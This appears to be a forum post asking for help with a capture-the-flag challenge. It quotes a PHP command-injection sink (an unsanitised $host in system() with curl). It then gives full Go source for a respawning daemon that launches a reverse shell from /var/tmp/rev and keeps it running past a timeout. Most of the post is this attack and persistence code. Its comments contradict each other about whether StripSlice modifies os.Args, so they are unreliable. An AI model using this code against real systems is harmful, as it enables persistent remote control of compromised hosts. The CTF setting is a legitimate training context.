In order to obtain the chasm flag, we need to exploit a command injection vulnerability in certificate.php.
The key code is as below:
system("timeout 5 curl --insecure -v https://$host 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }' &");
The command begins with “timeout 5”, so my reverse shell gets disconnected automatically. So I tried uploading a Go binary that starts a daemon process to escape the timeout limit. This had a partial effect: it can survive for more than 5 seconds, but it still gets disconnected.
The source code of the daemon-starting process is as below:
package main
//build and run
//go build -ldflags "-s -w" go-daemon.go
//./go-daemon -daemon -forever
import (
"flag"
"fmt"
"log"
"os"
"os/exec"
"time"
)
const (
	// DAEMON is the name of the -daemon flag; main removes "-"+DAEMON from
	// os.Args (via StripSlice) before re-executing this binary.
	DAEMON = "daemon"
	// FOREVER is the name of the -forever flag; main removes "-"+FOREVER from
	// os.Args (via StripSlice) before re-executing this binary.
	FOREVER = "forever"
)
// DoSomething is the long-running worker body and never returns.
//
// It appends the standard logger's output to ./dosomething.log (created with
// mode 0644 if missing), starts "bash -c /var/tmp/rev" through SubProcess
// (the author's comment labels that command a reverse shell), and then loops
// forever logging its own PID and PPID every five seconds.
//
// Both the log file on disk and the spawned bash child are visible artifacts
// of this process; the log line format below is the string to look for.
func DoSomething() {
	// The OpenFile error is discarded: on failure fp is a nil *os.File and
	// log.SetOutput receives it anyway. Presumably the later log.Printf calls
	// then fail silently rather than panic — confirm before relying on the log.
	fp, _ := os.OpenFile("./dosomething.log", os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
	log.SetOutput(fp)
	//reverse shell
	cmd := []string{"bash", "-c", "/var/tmp/rev"}
	// SubProcess only starts the child; nothing here ever Waits on it, so its
	// exit status is never observed by this function.
	SubProcess(cmd)
	for {
		log.Printf("DoSomething running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
		time.Sleep(time.Second * 5)
	}
}
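// StripSlice returns a new slice holding every entry of slice except those
// equal to element, in their original order.
//
// The previous implementation removed matches in place with append, which
// shifted the caller's backing array; since this file passes os.Args, that
// silently rewrote os.Args whenever the flag was not the last argument. This
// version never writes to the input. A nil or empty input yields an empty,
// non-nil slice.
func StripSlice(slice []string, element string) []string {
	// Fresh backing array: the input must not be modified.
	out := make([]string, 0, len(slice))
	for _, s := range slice {
		if s != element {
			out = append(out, s)
		}
	}
	return out
}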
// SubProcess starts args[0] with args[1:] as its arguments, sharing this
// process's stdin, stdout and stderr with the child. A Start failure is
// reported on stderr with the "[-] Error:" prefix but is not otherwise
// signalled: the *exec.Cmd is returned in every case and the caller is
// expected to Wait on it. args must contain at least one entry.
func SubProcess(args []string) *exec.Cmd {
	child := exec.Command(args[0], args[1:]...)
	child.Stdin, child.Stdout, child.Stderr = os.Stdin, os.Stdout, os.Stderr
	if startErr := child.Start(); startErr != nil {
		fmt.Fprintf(os.Stderr, "[-] Error: %s\n", startErr)
	}
	return child
}
// main picks a mode from the command line and, unless it re-executes itself,
// ends in DoSomething.
//
//   -daemon:  re-execute this binary with "-daemon" removed from os.Args,
//             print this process's PID/PPID, and exit 0. The child inherits
//             the remaining flags; the parent never reaches DoSomething.
//   -forever: loop forever: re-execute this binary with "-forever" removed,
//             print PID/PPID, block in cmd.Wait, repeat. Never reaches
//             DoSomething.
//   neither:  print PID/PPID and run DoSomething in this process.
//
// When both flags are given the -daemon branch wins, so the child still
// carries -forever and becomes the respawning supervisor.
func main() {
	daemon := flag.Bool(DAEMON, false, "run in daemon")
	forever := flag.Bool(FOREVER, false, "run forever")
	flag.Parse()
	fmt.Printf("[*] PID: %d PPID: %d ARG: %s\n", os.Getpid(), os.Getppid(), os.Args)
	if *daemon {
		// StripSlice removes matches with append on the input, so os.Args's
		// backing array is shifted in place when "-daemon" is not the last
		// argument; nothing after this line reads os.Args in this branch.
		SubProcess(StripSlice(os.Args, "-"+DAEMON))
		fmt.Printf("[*] Daemon running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
		os.Exit(0)
	} else if *forever {
		for {
			// Same in-place shifting as above, but here os.Args is re-read on
			// every iteration, so a "-forever" that is not the last argument is
			// only stripped the first time round.
			cmd := SubProcess(StripSlice(os.Args, "-"+FOREVER))
			fmt.Printf("[*] Forever running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
			// The Wait error is discarded. SubProcess returns a cmd even when
			// Start failed; presumably Wait then returns at once, which would
			// turn this into a tight respawn loop with no back-off — confirm.
			cmd.Wait()
		}
		//os.Exit(0)
	} else {
		fmt.Printf("[*] Service running in PID: %d PPID: %d\n", os.Getpid(), os.Getppid())
	}
	DoSomething()
}
Can anyone give me a suggestion?